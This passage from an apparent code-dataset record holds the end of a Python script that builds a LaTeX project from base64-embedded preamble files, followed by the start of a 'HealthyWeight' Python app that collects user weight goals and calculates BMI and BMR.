kga2V5d29yZHMgKEJsdWUpClxkZWZpbmVjb2xvcntsc3RLZXkyfXtyZ2J9ezEsMC42NjY2\nNjcsMC4xMzcyNn0gICUgY29kZTogc2Vjb25kYXJ5IGtleXdvcmRzIChEYXlbOV0gT3JhbmdlKQpc\nZGVmaW5lY29sb3J7bHN0U3RyaW5nfXtyZ2J9ezAuMSwwLjY1LDAuMX0JCSUgY29kZTogc3RyaW5n\ncyAoR3JlZW4pClxkZWZpbmVjb2xvcntsc3RCYXNlfXtyZ2J9ezAuMCwwLjAsMC4wfQkJCSUgY29k\nZTogYmFzZSAoQmxhY2spCgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAg\nICAgICAgICBUaWt6ICAgICAgICAgICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlCgpcdXNlcGFja2FnZXt0aWt6fQkJCQkJCQkJJSBpbXBvcnQgYmFzZXBhY2thZ2UKXHVzZXRp\na3psaWJyYXJ5e2NhbGN9CQkJCQkJCSUgQ29vcmRpbmF0ZSBjYWxjdWF0aW9ucwpcdXNldGlremxp\nYnJhcnl7cG9zaXRpb25pbmd9ICAgICAgICAgICAgICAgICAgICAlIFJlbGF0aXZlIHBvc2l0aW9u\naW5nClx1c2V0aWt6bGlicmFyeXtzaGFwZXN9ICAgICAgICAgICAgICAgICAgICAgICAgICUgRGVm\naW5pbmcgbm9kZXNoYXBlcyBhbmQgbW9yZSAoaXNhIGZvciBFL1IpCgolIFNpbXBsZSB0cmVlIG1h\nY3JvIHdpdGggY29tcGFiaWxpdHkgdG8gdGlregpcdXNlcGFja2FnZXt0aWt6LXF0cmVlfQkJCQkJ\nCQklIGltcG9ydCBzaW1wbGUgdHJlZSBtYWNybwpcdXNldGlremxpYnJhcnl7YXJyb3dzfSAgICAg\nICAgICAgICAgICAgICAgICAgICAlIGFycm93cyBmb3IgdHJlZXMKCiUgVGlreiBzZXR0aW5ncyBm\nb3IgcmVkLWJsYWNrIHRyZWVzClx0aWt6c2V0ewogIHRyZWVub2RlLy5zdHlsZSA9IHthbGlnbj1j\nZW50ZXIsIGlubmVyIHNlcD0wcHQsIHRleHQgY2VudGVyZWQsCiAgICBmb250PVxzZmZhbWlseX0s\nCiAgYXJuX2IvLnN0eWxlID0ge3RyZWVub2RlLCBjaXJjbGUsIHdoaXRlLCBmb250PVxzZmZhbWls\neVxiZnNlcmllcywgZHJhdz1ibGFjaywKICAgIGZpbGw9YmxhY2ssIHRleHQgd2lkdGg9MS41ZW19\nLCAgICAgICAgICAgICAgJSBibGFjayBub2RlCiAgYXJuX3IvLnN0eWxlID0ge3RyZWVub2RlLCBj\naXJjbGUsIHdoaXRlLCBmb250PVxzZmZhbWlseVxiZnNlcmllcywgZHJhdz1yZWQsCiAgICBmaWxs\nPXJlZCwgdGV4dCB3aWR0aD0xLjVlbX0sICAgICAgICAgICAgICAlIHJlZCBub2RlCiAgYXJuX3gv\nLnN0eWxlID0ge3RyZWVub2RlLCByZWN0YW5nbGUsIGRyYXc9YmxhY2ssIGZpbGw9YmxhY2ssCiAg\nICBtaW5pbXVtIHdpZHRoPTAuNWVtLCBtaW5pbXVtIGhlaWdodD0wLjVlbX0gICUgbmlsIG5vZGUK\nfQoKJSBUaWt6IEF1dG9tb3RhIGZvciBUdXJpbmcgTWFjaGluZXMKXHVzZXRpa3psaWJyYXJ5e2F1\ndG9tYXRhfQoKJSBUaWt6IEUvUiBkaWFncmFtClx1c2V0aWt6bGlicmFyeXtlcn0KCiUgR3JhcGhp\nY3MgYW5kIHBsb3RzClx1c2VwYWNrYWdle2dyYXBoaWN4fQkJCQkJCQklIGltcG9ydCBiYXNlcGFj\na2FnZSBmb3IgZ3JhcGhzClx1c2VwYWNrYWdle3BnZnBsb3RzfQkJCQkJCQklIGltcG9ydCBwZ2Zw\nbG90cwpcdXNlcGdmcGxvdHNsaWJyYXJ5e2ZpbGxiZXR3ZWVufQkJCQklIGFkZCBmaWxsQmV0d2Vl\nbiBjb21tYW5kClxwZ2ZwbG90c3NldHtjb21wYXQ9MS4xMH0JCQkJCQklIGNob29zZSB2ZXJzaW9u\nIG9mIHBnZnBsb3RzCgolIE1hY3JvIGZvciBjaXJjbGUgd2l0aCBzeW1ib2wgaW5zaWRlLgpcbmV3\nY29tbWFuZCpcY2lyY2xlZFsxXXsgXHRpa3pbYmFzZWxpbmU9KEMuYmFzZSldXG5vZGVbZHJhdyxj\naXJjbGUsaW5uZXIgc2VwPTAuNXB0XShDKSB7IzF9O1whfQoKCgolJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJQolICAgICAgICAgICAgQ29kZSAgICAgICAgICAgICAgJQolJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQpcbmV3Y29tbWFuZHtcY29
kZX1bMV17e1xzZiAjMX19CQkJ\nCQklIFxjb2Rle1h9IHdyaXRlcyBYIGluIGEgY29kZS1hcHByb3ByaWF0ZSBmb250CgoKCgolJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAgICAgbHN0bGlzdGluZyAgICAgICAg\nICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQoKJSBJbXBvcnQgbHN0bGlzdGlu\nZ3MgLSBiZWF1dGlmdWwgc291cmNlY29kZSEKXHVzZXBhY2thZ2V7bGlzdGluZ3N9CgoKJSBDdXN0\nb20gbGFuZ3VhZ2UgZGVmaW5pdGlvbnMKJSBEZWZpbml0aW9uIG9mIFBzZXVkb2NvZGUKXGxzdGRl\nZmluZWxhbmd1YWdle3BzZXVkb2NvZGV9ewogIGtleXdvcmRzPVsxXXsKICAJICAgICBieSwgYnks\nIGRvd250bywgZWxzZSwgZXJyb3IsIGZvciwgaWYsIHJlcGVhdCwgcmV0dXJuLCB0bywgdW50aWws\nIHdoaWxlLCB3aGlsZQogIAl9LAkJCQkJCQkJICAgIAkJJSBsaXN0IG9mIGtleXdvcmRzLCBmaXJz\ndCBhbmQgbGFzdCBhcmUgbm90IHVzZWQKICBrZXl3b3Jkcz1bMl17CiAgICAgICAgYW5kLCBhbmQs\nIG9yLCBOSUwsIE5JTAogIH0KICBzZW5zaXRpdmU9ZmFsc2UsCQkJCQkJCQklIGtleXdvcmRzIGFy\nZSBub3QgY2FzZS1zZW5zaXRpdmUKICBtb3JlY29tbWVudD1bbF17Ly99LAkJCQkJCQklIGwgaXMg\nZm9yIGxpbmUgY29tbWVudAogIG1vcmVjb21tZW50PVtzXXsvKn17Ki99LAkJCQkJCSUgcyBpcyBm\nb3Igc3RhcnQgYW5kIGVuZCBkZWxpbWl0ZXIKICBtb3Jlc3RyaW5nPVtiXSIJCQkJCQkJCSUgc3Ry\naW5ncyBhcmUgZW5jbG9zZWQgaW4gZG91YmxlIHF1b3Rlcwp9CgoKJSBTZXR0aW5ncyBmb3IgbHN0\nbGlzdGluZ3MKXGxzdHNldHtsYW5ndWFnZT1wc2V1ZG9jb2RlLAkJCQkJJSBjaG9vc2UgbGFuZ3Vh\nZ2UKICBjb2x1bW5zPWZsZXhpYmxlLAkJCQkJCQkJJSBsZXQgdGhlIGJveCBhbGlnbiB0byB0aGUg\nd2lkdGggb2YgdGhlIHBhZ2UKICBicmVha2xpbmVzPXRydWUsCQkJCQkJCQklIGF1dG9tYXRpY2Fs\nbHkgYnJlYWsgbGluZXMKICBicmVha2F0d2hpdGVzcGFjZT10cnVlLAkJCQkJCSUgYXV0b21hdGlj\nYWxseSBicmVhayBzaG91bGQgdGhlcmUgb25seSBiZSB3aGl0ZSBzcGFjZS4KICBudW1iZXJzPWxl\nZnQsCQkJCQkJCQkJJSBudW1iZXJpbmc6IG5vbmUsIGxlZnQsIHJpZ2h0CiAgbnVtYmVyc2VwPTVw\ndCwJCQkJCQkJCSUgZGlzdGFuY2UgYmV0d2VlbiBsaW5lbnVtYmVycyBhbmQgY29kZQogIG51bWJl\ncnN0eWxlPVxjb2xvcntsc3RDb21tZW50fSwJCQkJJSBjaGFuZ2Ugc3R5bGUgb2YgbnVtYmVyaW5n\nIC0gY3VycmVudGx5IGdyZXkuCiAgc3RlcG51bWJlcj0xLAkJCQkJCQkJCSUgc3RlcCBiZXR3ZWVu\nIHRvIGxpbmUtbnVtYmVycy4gMSA9IGVhY2ggbGluZSBpcyBudW1iZXJlZAogIHNob3dzcGFjZXM9\nZmFsc2UsCQkJCQkJCQklIHNob3cgc3BhY2VzIGV2ZXJ5d2hlcmUgLSBhZGRpbmcgcGFydGljdWxh\nciB1bmRlcnNjb3JlcwogIHNob3dzdHJpbmdzcGFjZXM9ZmFsc2UsCQkJCQkJJSB1bmRlcmxpbmUg\nc3BhY2VzIHdpdGhpbiBzdHJpbmdzIG9ubHkuCiAgc2hvd3RhYnM9ZmFsc2UsCQkJCQkJCQklIHNo\nb3cgdGFicyB3aXRoaW4gc3RyaW5ncyBhZGRpbmcgcGFydGljdWxhciB1bmRlcnNjb3Jlcy4KICBl\nc2NhcGVpbnNpZGU9eypAfXtAKn0sICAgICAgICAgICAgICAgIAkJJSBpZiB5b3Ugd2FudCB0byBh\nZGQgTGFUZVggd2l0aGluIHlvdXIgY29kZQogIGJhc2ljc3R5bGU9XHR0ZmFtaWx5IFxjb2xvcnts\nc3RCYXNlfSwJCQklIHNldCBiYXNpYyBjb2xvcgogIGNvbW1lbnRzdHlsZT1cY29sb3J7bHN0Q29t\nbWVudH0sCQkJCSUgc2V0IGNvbG9yIG9mIGNvbW1lbnRzCiAga2V5d29yZHN0eWxlPVsxXVxjb2xv\ncntsc3RLZXl9LAkJCQklIHNldCBjb2xvciBvZiBwcmltYXJ5IGtleXdvcmRzCiAga2V5d29yZHN0\neWxlPVsyXVxjb2xvcntsc3RLZXkyfSwJCQkJJSBzZXQgY29sb3Igb2Ygc2Vjb25kYXJ5IGtleXdv\ncmRzCiAgc3RyaW5nc3R5bGU9XGNvbG9ye2xzdFN0cmluZ30sCQkJCSUgc2V0IGNvbG9yIG9mIHN0\ncmluZ3MKfQoKJSBsc3RsaXN0aW5nIC0gUHV0IGl0IGJlYXV0aWZ1bGx5IGluIHRoZSBtaWRkbGUK\nXGxzdHNldHt4bGVmdG1hcmdpbj0gLjFcdGV4dHdpZHRoICwgICAgIAkJCQkJCQklIGxlZnRtYXJn\naW4gYmVpbmcgMTAlIG9mIHRoZSBjdXJyZW50IHdpZHRoCiAgeHJpZ2h0bWFyZ2luPSAuMVx0ZXh0\nd2lkdGgsICAgICAgICAgICAJCQkJCQkJJSByaWdodCBtYXJnaW4gYWxzbyAxMCUKICBmcmFtZT1i\nb3R0b21saW5lICAgICAgICAgICAgICAgICAgICAgIAkJCQkJCQklIERyYXcgYSBsaW5lIG9uIHRo\nZSBib3R0b20gb2YgdGhlIHN1cnJvdW5kaW5nIGJveAp9CgolIGxzdGxpc3RpbmcgaGVhZGVyClxE\nZWNsYXJlQ2FwdGlvbkZvbnR7d2hpdGV9e1xjb2xvcnt3aGl0ZX19ICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgJSBmb250c3R5bGUgb2YgY2FwdGlvbgpcRGVjbGFyZUNhcHRp\nb25Gb3JtYXR7bGlzdGluZ317XGNvbG9yYm94e2dyYXl9e1xwYXJib3h7XGxpbmV3aWR0aH17IzEj\nMiMzfX19ICAgICUgY3JlYXRlIG5pY2UgZ3JleSBib3hlcyBmb3IgY2FwdGlvbnMKXGNhcHRpb25z\nZXR1cFtsc3RsaXN0aW
5nXXtmb3JtYXQ9bGlzdGluZyxsYWJlbGZvbnQ9d2hpdGUsdGV4dGZvbnQ9\nd2hpdGV9ICAgICAgICAlIGFwcGx5IHNldHRpbmdzIHRvIGxpc3RpbmcKCgolJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgIFRpdGxlIGFuZCBpbmZvcm1hdGlvbiAgICAg\nICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQpcc2V0dmFsdWV7dGl0bGUg\nPSBLZWVwIENhbG0gYW5kIFx0ZXh0YmFja3NsYXNoIHNldHRpdGxlfQpcc2V0dmFsdWV7c3VidGl0\nbGUgPSB9CgpcRGVjbGFyZURvY3VtZW50Q29tbWFuZCBcc2V0dGl0bGUgeyBtIGcgfXsgCQkJCSUg\nXHNldFRpdGxle3RpdGxlfXtzdWJ0aXRsZX0KCSBcc2V0dmFsdWV7dGl0bGUgPSBcaHVnZSAjMX0K\nCSBcSWZWYWx1ZVQgeyMyfSB7IFxzZXR2YWx1ZXtzdWJ0aXRsZSA9IFxcIFxsYXJnZSAjMn0gfQp9\nCgpcc2V0dmFsdWV7bmFtZSA9IH0KXHNldHZhbHVle2VtYWlsID0gfQpcc2V0dmFsdWV7aWQgPSB9\nCgpcRGVjbGFyZURvY3VtZW50Q29tbWFuZCBcYWRkYXV0aCB7IG0gZyBnIH17IAkJCSUgXHNldEF1\ndGh7bmFtZX17ZW1haWx9e2lkfQoJIFxzZXR2YWx1ZXtuYW1lID0gIzF9CgkgXGF1dGhvcnsjMX0K\nCSBcSWZWYWx1ZVQgeyMyfSB7CgkgCVxzZXR2YWx1ZXtlbWFpbCA9ICMyfQoJIAlcYWZmaWx7XHBy\nb3RlY3RcaHJlZnttYWlsdG86IzJ9eyMyfX0KCSB9CgkgXElmVmFsdWVUIHsjM30gewoJIAlcc2V0\ndmFsdWV7aWQgPSAjM30KCSB9Cn0KClx0aXRsZXtcZ2V0dmFsdWV7dGl0bGV9IFxnZXR2YWx1ZXtz\ndWJ0aXRsZX19CgpcZGF0ZXtcdG9kYXl9Cgpcc2V0dmFsdWV7b2YgPSBvZn0KClxsaGVhZHtccHJv\ndGVjdFxocmVme1xnZXR2YWx1ZXtlbWFpbH19e1xnZXR2YWx1ZXtuYW1lfVxnZXR2YWx1ZXtpZH19\nfQpcY2hlYWR7fQpccmhlYWR7XEBjdXJyZW50bGFiZWxuYW1lXCB8IFx0aGVwYWdlXCBcZ2V0dmFs\ndWV7b2Z9IFxwYWdlcmVme0xhc3RQYWdlfX0KCiVcbGZvb3R7fQolXGNmb290e30KJVxyZm9vdHt9\nCg==\n\"\"\"\npreamble_en = \"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSBTZXR0aW5ncyBmb3IgZG9jdW1l\nbnQgKGVuZ2xpc2gpICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgSW5w\ndXQgY29tbW9uIGRlZmluaXRpb24KXGlucHV0e3ByZWFtYmxlX2Jhc2UudGV4fQoKCiUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICBFbmNvZGluZyBhbmQgaHlwaGVuYXRpb24gICAl\nCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgQmFzaWNzOiBmb250LCBjb2RlYyBl\ndGMuClx1c2VwYWNrYWdlW2VuZ2xpc2hde2JhYmVsfQkJCQkJCSUgYmFiZWwgaXMgZm9yIGh5cGhl\nbmF0aW9uIGFuZCBvdGhlciBnb29kaWVzCgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlCiUgICAgICAgICBsc3RsaXN0aW5nICAgICAgICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlClxyZW5ld2NvbW1hbmR7XGxzdGxpc3RpbmduYW1lfXtDb2RlfSAgICAgICAg\nICAgICAgJSBmb3Igb25lIGJsb2NrIG9mIGNvZGUgYWxvbmUKXHJlbmV3Y29tbWFuZHtcbHN0bGlz\ndGxpc3RpbmduYW1lfXtMaXN0IG9mIGNvZGV9ICAlIGZvciBtb3JlIHBpZWNlcyBvZiBjb2RlIGlu\nIG9uZQoKCgolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAgTG9naWMgYW5k\nIHByb29mcyAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolIFRoZW9y\nZW0gZW52aXJvbm1lbnRzClxuZXd0aGVvcmVte3RoZW9yZW19e1RoZW9yZW19W3NlY3Rpb25dClxu\nZXd0aGVvcmVte2xlbW1hfXtMZW1tYX1bc2VjdGlvbl0KXG5ld3RoZW9yZW17cHJvcG9zaXRpb259\ne1Byb3Bvc2l0aW9ufVtzZWN0aW9uXQpcbmV3dGhlb3JlbXtjb3JvbGxhcnl9e0Nvcm9sbGFyeX1b\nc2VjdGlvbl0KXG5ld3RoZW9yZW17ZGVmaW5pdGlvbn17RGVmaW5pdGlvbn1bc2VjdGlvbl0KXG5l\nd3RoZW9yZW17Y29uamVjdHVyZX17Q29uamVjdHVyZX1bc2VjdGlvbl0KXHJlbmV3Y29tbWFuZCp7\nXHByb29mbmFtZX17UHJvb2Z9CgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUg\nICAgICBFeGFtcGxlIGVudmlyb25tZW50ICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlClxuZXd0aGVvcmVte2V4YW1wbGV9e0V4YW1wbGV9W3NlY3Rpb25d\n\"\"\"\npreamble_dk = 
\"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolIFNldHRpbmdzIGZvciBkb2N1bWVu\ndCAoZGFuaXNoKSAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgSW5wdXQg\nY29tbW9uIGRlZmluaXRpb24KXGlucHV0e3ByZWFtYmxlX2Jhc2UudGV4fQoKJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgIEVuY29kaW5nIGFuZCBoeXBoZW5hdGlvbiAgICUKJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSBCYXNpY3M6IGZvbnQsIGNvZGVjIGV0Yy4K\nXHVzZXBhY2thZ2VbZGFuaXNoXXtiYWJlbH0JCQkJCQklIGJhYmVsIGlzIGZvciBoeXBoZW5hdGlv\nbiBhbmQgb3RoZXIgZ29vZGllcwpccmVuZXdjb21tYW5ke1xkYW5pc2hoeXBoZW5taW5zfXsyMn0J\nCQklIGV2ZW4gYmV0dGVyIGRhbmlzaCBoeXBoZW5hdGlvbiEKCiUgLmJpYiBkYW5pc2ggcmVkZWZp\nbml0aW9uIGZvciBhdXRob3IgaW4gdGl0bGUKXHJlbmV3Y29tbWFuZFxBdXRoYW5keyBvZyB9Clxy\nZW5ld2NvbW1hbmRcQXV0aGFuZHN7LCBvZyB9ClxyZW5ld2NvbW1hbmRcQWZmaWxmb250e1xzbWFs\nbH0KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgICAgIGxzdGxpc3Rp\nbmcgICAgICAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgbHN0bGlz\ndGluZyBsYW5ndWFnZSByZWRlZmluaXRpb25zClxyZW5ld2NvbW1hbmR7XGxzdGxpc3RpbmduYW1l\nfXtLb2RlfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJSBmb3Ig\nb25lIGJsb2NrIG9mIGNvZGUgYWxvbmUKXHJlbmV3Y29tbWFuZHtcbHN0bGlzdGxpc3RpbmduYW1l\nfXtMaXN0ZSBhZiBcbHN0bGlzdGluZ25hbWUgcn0gICAgICAgICAgICAgICAgICAlIGZvciBtb3Jl\nIHBpZWNlcyBvZiBjb2RlIGluIG9uZQoKCgolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJQolICAgICAgTG9naWMgYW5kIHByb29mcyAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJQolIFRoZW9yZW0gZW52aXJvbm1lbnRzClxuZXd0aGVvcmVte3RoZW9yZW19e1PD\npnRuaW5nfVtzZWN0aW9uXQpcbmV3dGhlb3JlbXtsZW1tYX17TGVtbWF9W3NlY3Rpb25dClxuZXd0\naGVvcmVte3Byb3Bvc2l0aW9ufXtQcm9wb3NpdGlvbn1bc2VjdGlvbl0KXG5ld3RoZW9yZW17Y29y\nb2xsYXJ5fXtLb3JvbGxhcn1bc2VjdGlvbl0KXG5ld3RoZW9yZW17ZGVmaW5pdGlvbn17RGVmaW5p\ndGlvbn1bc2VjdGlvbl0KXG5ld3RoZW9yZW17Y29uamVjdHVyZX17Rm9ybW9kbmluZ31bc2VjdGlv\nbl0KXHJlbmV3Y29tbWFuZCp7XHByb29mbmFtZX17QmV2aXN9CgoKJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUKJSAgICAgIEV4YW1wbGUgZW52aXJvbm1lbnQgICAgICUKJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKXG5ld3RoZW9yZW17ZXhhbXBsZX17RWtzZW1wZWx9W3Nl\nY3Rpb25dCgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAgICAgVGl0bGUg\nYW5kIGxheW91dCAgICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlClxzZXR2\nYWx1ZXtvZiA9IGFmfQo=\n\"\"\"\n\n \nparser = argparse.ArgumentParser(description='Make a LaTeX project from Steffan\\'s awesome template')\nparser.add_argument('path', type=str, nargs='+', help='the path to build the project')\nparser.add_argument('-l', type=str, nargs=1, help='the language of the preamble, \"en\" or \"dk\"', default=[\"en\"])\nparser.add_argument('--zip', dest='zip', action='store_const', const=True, default=False, help='zip the resulting project')\n#TODO: Add -c option to clean folders first / after\nargs = parser.parse_args()\n\npreamble_locale = 'preamble_dk' if args.l[0] == 'dk' else 'preamble_en'\npreamble_l_content = preamble_dk if args.l[0] == 'dk' else preamble_en\npreamble_l_content = base64.decodestring( preamble_l_content )\npreamble_base_content = base64.decodestring( preamble_base )\ntemplate_content = base64.decodestring( template )\n\n#TODO: make this specifiable in the prepare.py\n######## MODIFICATIONS ########\n\ntemplate_content = template_content.replace( '\\subimport{../preamble/}{preamble_en.tex}',\n'\\subimport{preamble/}{' + preamble_locale + '.tex}')\n\n###############################\n\nPATH = \" \".join(args.path)\nif not os.path.exists(PATH):\n os.makedirs(PATH)\nos.chdir(PATH)\nif not os.path.exists('preamble'):\n os.mkdir('preamble')\nwith open(os.path.join('preamble', preamble_locale + '.tex'), 
'w') as preamble_l_file:\n preamble_l_file.write(preamble_l_content)\n\nwith open(os.path.join('preamble', 'preamble_base.tex'), 'w') as preamble_base_file:\n preamble_base_file.write(preamble_base_content)\n\nwith open('template.tex', 'w') as template_file:\n template_file.write(template_content)\n\nif args.zip:\n fname = os.getcwd() #includes the filepath, since we cd'ed to it\n import zipfile\n zipf = zipfile.ZipFile(fname + '.zip', 'w', zipfile.ZIP_DEFLATED)\n zipf.write(os.path.join('preamble', preamble_locale + '.tex'))\n zipf.write(os.path.join('preamble', 'preamble_base.tex'))\n zipf.write('template.tex')\n zipf.close()\nraw_input('Success! Press enter to exit')\n"
}
] | 1 |
shantaladajian/HealthyWeight
|
https://github.com/shantaladajian/HealthyWeight
|
184e41d6dba63fb1277946e2b1a096d4bb7f3646
|
96f0c34ea073be3e11184b3ac9f2dc96b763a70f
|
c1a279a3231da45a441002064db35bf9a19cf0d8
|
refs/heads/master
| 2020-04-30T21:40:31.869107 | 2019-05-16T04:36:59 | 2019-05-16T04:36:59 | 177,099,066 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.549699068069458,
"alphanum_fraction": 0.5583625435829163,
"avg_line_length": 43.172515869140625,
"blob_id": "3ecb804db0cd11e477ddcefbb0a08477db386a26",
"content_id": "b76c8b64bfaf82900e933c0350f04f9cf8a4591f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15121,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 342,
"path": "/main.py",
"repo_name": "shantaladajian/HealthyWeight",
"src_encoding": "UTF-8",
"text": "import json\nimport os\nimport random\n\ndef loadOptions():\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n\n user_options = datas[\"dataOptions\"]\n return user_options\n\n\ndef AskForDataOptions(data):\n print(\"\\nDear User, you're going to answer for the following : \", (\" , \").join(data.keys()))\n x = input(\"\\nDear user, please create a username by typing it in directly :\")\n options = {x: {\"dataOptions\": {}}}\n\n for key in data:\n while True:\n datas = tuple(data[key])\n print(\"\\nFor your \" + key + \" answer 0 for \" + datas[0] + \" , answer 1 for \" + datas[1])\n if len(datas) > 2:\n print(\"answer 2 for \" + datas[2])\n p = input(\"\\nyour\" + key + \"is : \")\n if (p.isnumeric()):\n p = int(p)\n if p < 3 and p > -1:\n options[x][\"dataOptions\"][key] = datas[p]\n break\n else:\n print(\"\\nplease try again. Answer in the form of the integers mentioned above. \\n\")\n else:\n print(\"\\nplease try again. Answer in the form of the INTEGERS mentioned above. \\n\")\n return x, options\n\n\ndef SaveOptions(options):\n a = os.listdir()\n if \"users.json\" in a:\n with open('users.json') as file1:\n initialold = json.load(file1)\n initialold.update(options)\n file = open('users.json', 'w')\n file.write(json.dumps(initialold))\n file.close()\n else:\n file = open(\"users.json\", \"w\")\n file.write(json.dumps(options))\n file.close()\n\n\ndef AskForinitialData(x):\n a = open(\"users.json\", \"r\")\n dataOptions = json.load(a)\n if dataOptions[x]['dataOptions'][\"healthCondition\"] == \"bad\":\n print(\"\\nWARNING: Dear user,because of your bad health condition, please consult your doctor before following our plan. :) \\n\")\n\n if dataOptions[x]['dataOptions'][\"initialWeightGoal\"] == \"maintain\":\n def loadinitialDataForMaintain():\n a = os.listdir()\n if \"datas.json\" in a:\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n\n user_initialDataForMaintain = datas[\"initialDataForMaintain\"]\n return user_initialDataForMaintain\n\n user_initialDataForMaintain = loadinitialDataForMaintain()\n\n print(\"\\nDear User, you're going to answer for the following: \",\n (\" , \").join(user_initialDataForMaintain.keys()), \"\\n\")\n initial = {x: {\"initialData\": {}}}\n print(\n \"\\nInput you height in the integer form in cm, and your weight in kg.\")\n for key in user_initialDataForMaintain:\n while True:\n inputt = input(\"your \" + key + \"is : \")\n if inputt.isnumeric():\n inputt = int(inputt)\n initial[x][\"initialData\"][key] = inputt\n break\n else:\n print(\"\\n please try again. Answer in the form of the integers mentioned above.\")\n return initial\n\n elif dataOptions[x][\"dataOptions\"][\"initialWeightGoal\"] == \"lose\":\n def loadinitialDataForLose():\n a = os.listdir()\n if \"datas.json\" in a:\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n user_initialDataForLose = datas[\"initialDataForLose\"]\n return user_initialDataForLose\n\n user_initialDataForLose = loadinitialDataForLose()\n\n print(\"\\nDear User, you're going to answer for the following : \",\n (\" , \").join(user_initialDataForLose.keys()))\n initial = {x: {\"initialData\": {}}}\n print(\n \"\\nInput height in the integer form in cm, and weight in kg\")\n\n for key in user_initialDataForLose:\n while True:\n inputt = input(\"your \" + key + \" is : \")\n try:\n inputt = float(inputt)\n initial[x][\"initialData\"][key] = inputt\n break\n except ValueError as e:\n print(\"\\nplease try again. 
Answer in the form mentioned above.\")\n return initial\n\n elif dataOptions[x][\"dataOptions\"][\"initialWeightGoal\"] == \"gain\":\n def loadinitialDataForGain():\n a = os.listdir()\n if \"datas.json\" in a:\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n user_initialDataForGain = datas[\"initialDataForGain\"]\n return user_initialDataForGain\n\n user_initialDataForGain = loadinitialDataForGain()\n\n print(\"\\nDear User, you're going to answer for the following:\",\n (\" , \").join(user_initialDataForGain.keys()))\n initial = {x: {\"initialData\": {}}}\n print(\"\\nInput your height in the integer form in CM, and your weight in KG. \\n \")\n for key in user_initialDataForGain:\n while True:\n inputt = input(\"your \" + key + \" is : \")\n try:\n inputt = float(inputt)\n initial[x][\"initialData\"][key] = inputt\n break\n except ValueError as e:\n print(\"\\nplease try again. Answer in the form of the integers mentioned above. \\n\")\n return initial\n\n\ndef SaveInitial(x, initial):\n a = os.listdir()\n if \"users.json\" in a:\n with open('users.json') as file1:\n initialold = json.load(file1)\n initialold[x].update(initial[x])\n file = open('users.json', 'w')\n file.write(json.dumps(initialold))\n file.close()\n\ndef CalculatingBMI(x):\n a = open(\"users.json\", \"r\")\n BMIfacts = json.load(a)\n h = int(BMIfacts[x][\"initialData\"][\"height\"])\n w = int(BMIfacts[x][\"initialData\"][\"initialWeight\"])\n BMI = float(w * 10000 / ((h * h)))\n BMI = \"{:.2f}\".format(BMI)\n print(\"\\nYour BMI is:\", BMI)\n if float(BMI) < 18.5:\n print(\"\\nDear user, your BMI indicates that you're underweight. The normal range is between 18.5-24.9.\")\n print(\"We suggest you choose the gaining goal if you haven't chosen that. \")\n elif float(BMI) >= 18.5 and float(BMI) < 25:\n print(\n \"\\nDear user, your BMI indicates that you're in the normal weight range! The normal range is between 18.5-24.9. \")\n print(\"We suggest you choose the maintaining goal if you haven't chosen that.\")\n elif float(BMI) >= 25 and float(BMI) < 30:\n print(\n \"\\nDear user, your BMI indicates that you're in the overweight range. The normal range is between 18.5-24.9.\")\n print(\"We suggest you choose the losing goal if you haven't chosen that.\")\n\n\ndef CalculatingBMR(x):\n a = open(\"users.json\", 